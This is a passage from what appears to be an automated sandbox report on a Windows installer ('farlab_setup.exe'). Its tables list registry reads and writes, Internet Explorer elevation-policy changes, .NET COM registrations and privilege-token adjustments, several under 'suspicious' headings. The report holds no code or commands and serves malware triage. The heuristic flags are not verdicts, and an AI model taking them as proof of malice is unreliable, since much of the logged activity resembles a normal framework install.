| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\lodctr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\lodctr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\mofcomp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\lodctr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\mofcomp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\lodctr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\lodctr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\mofcomp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9} | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppPath = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\Policy = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\Policy = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\CLSID = "{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\Policy = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\Policy = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\CLSID = "{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppPath = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9}\AppPath = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9}\Policy = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppName = "dfsvc.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppName = "dfsvc.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9}\AppName = "dfsvc.exe" | C:\Windows\system32\msiexec.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2F | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4E9963B7-B2BF-4685-9378-8FEBEA364EF8}\InprocServer32\4.0.0.0\Class = "Microsoft.Aspnet.Snapin.About" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A605AF61-CA33-3CAB-8DE5-4686EE45446D}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\InprocServer32\Class = "System.ServiceModel.ServiceMoniker40.ServiceMoniker40" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BEE4BFEC-6683-3E67-9167-3C0CBC68F40A}\2.4 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{6B7F18AE-F5AC-368F-8DFD-AB5E2D229ED7}\4.0.0.0\Class = "System.Runtime.CompilerServices.MethodCodeType" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{8351108F-34E3-3CC9-BF5A-C76C48060835}\4.0.0.0\Class = "System.Runtime.InteropServices.ArrayWithOffset" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{CA5C1C2B-61F8-3FC4-B66B-17163A3066A5}\4.0.0.0\Class = "System.Void" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{D93EACA8-8176-387B-9667-6D32B504047B}\4.0.0.0\Class = "System.Security.Policy.ApplicationVersionMatch" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{11472518-C3B8-3BF4-9705-2135E1709883}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{6BD98650-5AE6-3F03-B6CF-1463BBD45E6D}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{215B68E5-0E78-4505-BE40-962EE3A0C379}\ = "IPimcManager2" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{82B28727-8F1B-3C0D-92A6-EBE9F1F4B8C4}\4.0.0.0\Class = "System.Globalization.LineOrientation" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A2C06560-E728-39D5-8230-7EB08001C79E}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{0CFE1ABF-373D-3208-85C2-947434046704}\4.0.0.0\Class = "System.IO.SeekOrigin" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{299E2A7D-6551-3ED1-B4A0-A51CB56EEFE7}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{62AD7D6B-52CC-3ED4-A20D-1A32EF6BF1DA}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{8D583B4D-52C8-3243-829E-999D660D3947}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{049C5C49-BAF0-429C-8B8F-2CC11F5AA422} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E9963B7-B2BF-4685-9378-8FEBEA364EF8}\ = "Microsoft.Aspnet.Snapin.About" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{67D8C1D1-8D1A-3AB2-B8BF-5CB8D43199F5}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{7A8D353E-4BE8-308B-A3EB-5DEA56BB7798}\4.0.0.0\Class = "System.Security.AccessControl.AccessControlType" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{8D583B4D-52C8-3243-829E-999D660D3947}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{94942670-4ACF-3572-92D1-0916CD777E00}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{9ABE23BD-D5D5-30F6-B127-9B3AB98F7DBB}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2A7B042D-578A-4366-9A3D-154C0498458E}\InprocServer32\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2A7B042D-578A-4366-9A3D-154C0498458E}\InprocServer32\Class = "System.Management.Instrumentation.ManagedCommonProvider" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{0AD279C7-05FB-3A46-9031-92E00C9F7C29}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{68DB6E95-F774-3AE3-B1DE-B0CC80F6E174}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{816C979C-D3D2-3101-B5CA-E4A5C5E966FA}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{D89E7F8E-9F99-3EE9-8FCE-D97E64C8650E}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{D535A40B-83C0-36FC-82D1-7EF2DE252ECC}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C3E92FB0-4D2C-3FA7-8DCA-B4CF51DAB643}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{562E9B67-79AB-3033-9180-4BDBBB891853}\4.0.0.0\Class = "System.EnterpriseServices.TransactionOption" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{F75B6772-91E4-4D2F-9D44-61A447109C2B}\DllSurrogate | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{56ABB41C-4516-30F6-882E-57F234AB5028}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{9DC6AC40-EDFA-3E34-9AD1-B7A0A9E3A40A}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{B125618B-1B4E-37C3-B31A-331D6021B52D}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{B3E5A7FF-AFC6-3F2B-8FFF-300C7C567693}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\KB2533523 = "Servicing_Key" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4E9963B7-B2BF-4685-9378-8FEBEA364EF8}\InprocServer32\Assembly = "AspNetMMCExt, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{1E552DAE-602E-3CB5-9BFA-22AEB1FC38A5}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{94942670-4ACF-3572-92D1-0916CD777E00}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{049C5C49-BAF0-429C-8B8F-2CC11F5AA422}\ = "IPimcSurrogate2" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{F62FF05F-99CE-30DB-8344-2B2C26F5765C}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{0EF507FF-0B48-40AD-84DB-E4C7AB81B74A} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\F_CDF_core_amd64 = "NetFx_Full_amd64" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\KB2805221 = "Servicing_Key" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{56ABB41C-4516-30F6-882E-57F234AB5028}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{23D4A35B-C997-3401-8372-736025B17744}\4.0.0.0\Class = "System.Single" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{4548A129-2855-35E8-A892-FF506C877AA8}\4.0.0.0\Class = "System.Security.Permissions.HostProtectionResource" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{F0778630-AC34-3D71-9FAB-617F61243065}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{3E4D0EE1-9F86-3CF4-9E00-59873F6BDF86}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\InprocServer32\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{45FB4600-E6E8-4928-B25E-50476FF79425}\Implemented Categories\{62C8FE65-4EBB-45E7-B440-6E39B2CDBF29} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{0675DA92-4737-3250-A89C-802D9B630C1F}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{42A66664-072F-3A67-A189-7D440709A77E}\4.0.0.0\Class = "System.Configuration.Assemblies.AssemblyHash" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{5A235286-93F1-3C18-A3AE-16D345A87A24}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{72B06367-DE53-3111-9C49-B816EFEE3148}\4.0.0.0\RuntimeVersion = "v4.0.30319" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{8830F669-E622-3DA0-BC37-4A02A151E142}\4.0.0.0\Class = "System.Security.Principal.WindowsAccountType" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0EF507FF-0B48-40AD-84DB-E4C7AB81B74A}\NumMethods\ = "20" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{70446B90-F93B-3578-9B7B-95D05A12DA60}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{742BDC16-F04E-3E0E-8FF1-E3250940B5BF}\4.0.0.0\Class = "System.Security.Permissions.KeyContainerPermissionFlags" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Record\{C335350A-892D-37F7-967C-99B3C4C4A301}\4.0.0.0 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{BA68FFCE-C94A-3A7B-ABB9-BE5259B66D1B}\4.0.0.0\Assembly = "System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
